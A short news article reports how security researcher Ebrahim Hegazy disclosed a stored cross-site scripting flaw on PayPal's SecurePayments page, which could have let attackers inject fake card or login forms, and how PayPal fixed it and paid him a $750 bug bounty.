14 DAY TRIAL // Ebrahim Hegazy, an Egypt-based security expert has found and disclosed a security vulnerability to PayPal's staff that allowed an attacker to steal unencrypted credit card details.
Mr. Hegazy is primarily known for getting root access to one of Yahoo's servers, vulnerability which also affected Microsoft and Orange's domains.
He also has a history of disclosing security holes in products for the large online services, like Twitter, Yandex, Ebay, and Google.
A cross-site scripting (XSS) flaw on PayPal’s SecurePayments page
According to Hegazy's blog post, the vulnerability was found only on the "https://securepayments.paypal.com"domain, used to process commercial transactions.
"I’ve found a Stored XSS vulnerability that affects the SecurePayments page directly which allowed me to alter the page HTML and rewrite the page content," says Hegazy.
Using this flaw, an attacker would have been able to inject his own payment forms in the page's HTML, allowing him to intercept the user's private financial information in clear text.
Since PayPal regularly asks users to enter credit card numbers, card expiration dates, CSC codes, and even names, users would have found it very hard to detect anything out of the ordinary when asked for these details.
Attackers would have had complete control over the page's HTML
When the "fake" form was filled and submitted, this data could have been sent to any URL the attacker would have liked it sent to.
Additionally, since the attacker had the option to craft his own forms, he could have also injected a form that looked like the PayPal login, getting the username and password for the victim's PayPal account.
The vulnerability was properly disclosed to the PayPal team back in June, and was fixed two days ago.
For his efforts and according to the PayPal bug bounty program, Mr. Hegazy was rewarded $750 / €665, as SecurityWeek reports.
